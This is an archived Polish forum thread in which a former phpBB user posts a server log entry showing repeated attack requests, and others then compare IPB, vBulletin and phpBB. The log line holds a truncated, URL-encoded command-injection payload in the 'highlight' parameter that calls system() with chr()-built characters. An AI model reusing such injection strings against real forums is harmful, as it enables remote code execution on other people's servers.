Skocz do zawartości

hakowanie phpBB


nrm

Rekomendowane odpowiedzi

nie mam phpBB od 4 miesiecy a w logach codziennie mam takie odwołania:


/forum/viewtopic.php?p=6005&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr

Http Code: 301  Date: May 12 12:52:02  Http Version: HTTP/1.0  Size in Bytes: 314

Referer: -

Agent: Mozilla/4.0

:)

Odnośnik do komentarza
Udostępnij na innych stronach

wiem, ale nie sądziłęm, że na taką skalę. Mam dziennie takich wywołań dziesiątki... dobrze, że się rozstałem z phpBB Smile

Szkoda, że tego nie idzie jakoś wyrzucić.. :( Tj, to zabiera transfer ;)

pozdr.

usługi ślusarskie, frezowanie, spawanie, toczenie, zduny obróbka metalu,

kalkulator lokat bez podatku belki

Odnośnik do komentarza
Udostępnij na innych stronach

ja mam IPB od +/- pół roku i nienarzekam.

vB używam jako user na zagranicznych forach i tez jestem zadowolony, jako admin bawiłem sie na localhoscie i tez było przyjemnie.

Obie licencje są w podobnej cenie, jakbym miał kupować to z pewnością vB ale mimo wszystko byłbym daleki w opiniowaniu IPB jako "syf nad syfami" (bo jak wtedy nazwać phpBB?).

To mi przypomina rozmowe dresów (z takiego netowego komisku:)

- Jak jest?

- NIE!

:mrgreen:

Odnośnik do komentarza
Udostępnij na innych stronach

normanos, każdy ma swoje za i przeciw od IPB odszedłem 1.5 roku temu i od tego czasu nie miałem wogóle styczności z tym skrytem (no oprócz mandrake.pl), a wracając do IPB to troszke mnie przeraża Panel Administracyjny. Do phpBB nie mam nic, dużo łatwiej dla mnie jest pisać modyfikacje do phpbb ale może to przyzwyczajenie i fakt że kiedy miałem IPB to nie bawiłem się tyle kodem skryptów. Troszkę od tematu odbieliśmy :mrgreen:

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności